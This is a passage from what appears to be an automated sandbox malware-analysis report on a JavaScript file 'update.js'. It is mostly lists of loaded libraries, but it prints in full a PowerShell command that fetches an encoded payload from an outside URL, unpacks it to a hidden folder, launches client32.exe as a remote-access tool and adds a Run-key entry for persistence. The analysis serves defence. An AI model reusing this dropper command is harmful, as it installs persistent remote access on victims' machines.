                                Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: msxml3.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: dpapi.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: schannel.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: mskeyprotect.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: ntasn1.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: ncrypt.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: ncryptsslp.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: msxml3.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: wininet.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: dpapi.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dll
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeSection loaded: pcicl32.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeSection loaded: secur32.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeSection loaded: shfolder.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeSection loaded: pcichek.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeSection loaded: pcicapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeSection loaded: version.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeSection loaded: wsock32.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeSection loaded: msvcr100.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeSection loaded: msvcr100.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeSection loaded: oleacc.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeSection loaded: netapi32.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeSection loaded: samcli.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeSection loaded: dbghelp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeSection loaded: wtsapi32.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeSection loaded: dbgcore.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeSection loaded: nsmtrace.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeSection loaded: nslsp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeSection loaded: devobj.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeSection loaded: pcihooks.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeSection loaded: wbemcomn.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeSection loaded: mswsock.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeSection loaded: textshaping.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeSection loaded: winsta.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeSection loaded: amsi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeSection loaded: riched32.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeSection loaded: riched20.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeSection loaded: usp10.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeSection loaded: msls31.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeSection loaded: pciinv.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeSection loaded: firewallapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeSection loaded: dnsapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeSection loaded: fwbase.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeSection loaded: fwpolicyiomgr.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeSection loaded: dhcpcsvc6.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeSection loaded: dhcpcsvc.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeSection loaded: winhttp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeSection loaded: winnsi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeSection loaded: rasadhlp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeSection loaded: fwpuclnt.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile written: C:\Users\user\AppData\Roaming\HHIAHYOW-5\NSM.iniJump to behavior
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeFile opened: C:\Windows\SysWOW64\riched32.dllJump to behavior
                                Source: Window RecorderWindow detected: More than 3 window changes detected
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                                Source: update.jsStatic file information: File size 6980191 > 1048576
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\HHIAHYOW-5\msvcr100.dllJump to behavior
                                Source: Binary string: msvcr100.i386.pdb source: client32.exe

                                Data Obfuscation

                                barindex
                                Found suspicious powershell code related to unpacking or dynamic code loading
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($MAYUBQEXZZV);$asd = Get-Random -Minimum -5 -Maximum 12; $KDRZCQQAXE=[System.Environment]::GetFolderPath('ApplicationData')+'\HHIAHYOW'+$asd;if (!(Test-Path $KDRZCQQAXE -PathType Cont
                                Suspicious powershell command line found
                                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $HSFB='https://roadrunnersell.com/trade/d.php?5517';$MAYUBQEXZZV=(New-Object System.Net.WebClient).DownloadString($HSFB);$JCHVYBQIUC=[System.Convert]::FromBase64String($MAYUBQEXZZV);$asd = Get-Random -Minimum -5 -Maximum 12; $KDRZCQQAXE=[System.Environment]::GetFolderPath('ApplicationData')+'\HHIAHYOW'+$asd;if (!(Test-Path $KDRZCQQAXE -PathType Container)) { New-Item -Path $KDRZCQQAXE -ItemType Directory };$p=Join-Path $KDRZCQQAXE 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$JCHVYBQIUC);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$KDRZCQQAXE)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $KDRZCQQAXE 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $KDRZCQQAXE -Force; $fd.attributes='Hidden';$s=$KDRZCQQAXE+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='WZZCVTPAZ';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;
                                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $HSFB='https://roadrunnersell.com/trade/d.php?5517';$MAYUBQEXZZV=(New-Object System.Net.WebClient).DownloadString($HSFB);$JCHVYBQIUC=[System.Convert]::FromBase64String($MAYUBQEXZZV);$asd = Get-Random -Minimum -5 -Maximum 12; $KDRZCQQAXE=[System.Environment]::GetFolderPath('ApplicationData')+'\HHIAHYOW'+$asd;if (!(Test-Path $KDRZCQQAXE -PathType Container)) { New-Item -Path $KDRZCQQAXE -ItemType Directory };$p=Join-Path $KDRZCQQAXE 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$JCHVYBQIUC);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$KDRZCQQAXE)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $KDRZCQQAXE 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $KDRZCQQAXE -Force; $fd.attributes='Hidden';$s=$KDRZCQQAXE+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='WZZCVTPAZ';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: 13_2_11029BB0 GetTickCount,LoadLibraryA,GetProcAddress,SetLastError,_malloc,GetProcAddress,GetLastError,_free,_malloc,GetProcAddress,GetProcAddress,InternetOpenA,SetLastError,SetLastError,SetLastError,_free,GetProcAddress,SetLastError,GetProcAddress,InternetConnectA,GetProcAddress,SetLastError,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetLastError,GetProcAddress,SetLastError,GetLastError,GetDesktopWindow,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,FreeLibrary,13_2_11029BB0
                                Source: PCICL32.DLL.10.drStatic PE information: section name: .hhshare
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFEC8594747 push ds; retf 10_2_00007FFEC859474F
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFEC86D3DE4 push 8B48FFEDh; iretd 10_2_00007FFEC86D3DE9
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFEC86D6FD9 push ebx; iretd 10_2_00007FFEC86D6FDA
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFEC8937D20 pushfd ; ret 10_2_00007FFEC8937D21
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFEC89383DC push 3BFF97A2h; ret 10_2_00007FFEC89383E1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFEC8932376 push esp; iretd 10_2_00007FFEC8932379
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFEC8A98405 push eax; ret 10_2_00007FFEC8A9840D
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFEC8A94F6C pushad ; ret 10_2_00007FFEC8A94FD4
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFEC8C76CCF push ebp; ret 10_2_00007FFEC8C76CD0
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFEC8C77AD9 push ebx; iretd 10_2_00007FFEC8C77B2A
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFEC8C71EC9 push es; iretd 10_2_00007FFEC8C71EEA
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFEC8C78099 push esp; iretd 10_2_00007FFEC8C7809A
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFEC8C70048 push eax; retf 10_2_00007FFEC8C70049
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFEC8C7765F push eax; iretd 10_2_00007FFEC8C7783A
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFEC8C77213 push eax; iretd 10_2_00007FFEC8C7783A
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFEC8C7040E push ecx; ret 10_2_00007FFEC8C70419
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFEC8C72035 push es; iretd 10_2_00007FFEC8C7204A
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFEC8C7022F push ebx; ret 10_2_00007FFEC8C70230
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFEC8C781D9 push ebp; iretd 10_2_00007FFEC8C781DA
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFEC8C71FB8 push es; iretd 10_2_00007FFEC8C71FBA
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFEC8C783B9 push esi; iretd 10_2_00007FFEC8C783BA
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFEC8C77D46 push esi; ret 10_2_00007FFEC8C77D67
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFEC8C70147 push esp; ret 10_2_00007FFEC8C70158
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: 13_2_1116FF15 push ecx; ret 13_2_1116FF28
                                Source: msvcr100.dll.10.drStatic PE information: section name: .text entropy: 6.909044922675825
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\HHIAHYOW-5\remcmdstub.exeJump to dropped file
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\HHIAHYOW-5\pcicapi.dllJump to dropped file
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\HHIAHYOW-5\PCICHEK.DLLJump to dropped file
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeJump to dropped file
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\HHIAHYOW-5\HTCTL32.DLLJump to dropped file
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\HHIAHYOW-5\PCICL32.DLLJump to dropped file
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\HHIAHYOW-5\TCCTL32.DLLJump to dropped file
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\HHIAHYOW-5\msvcr100.dllJump to dropped file
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: 13_2_11128B10 GetMessageA,Sleep,OpenSCManagerA,DispatchMessageA,OpenServiceA,CloseServiceHandle,StartServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError,13_2_11128B10
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WZZCVTPAZJump to behavior
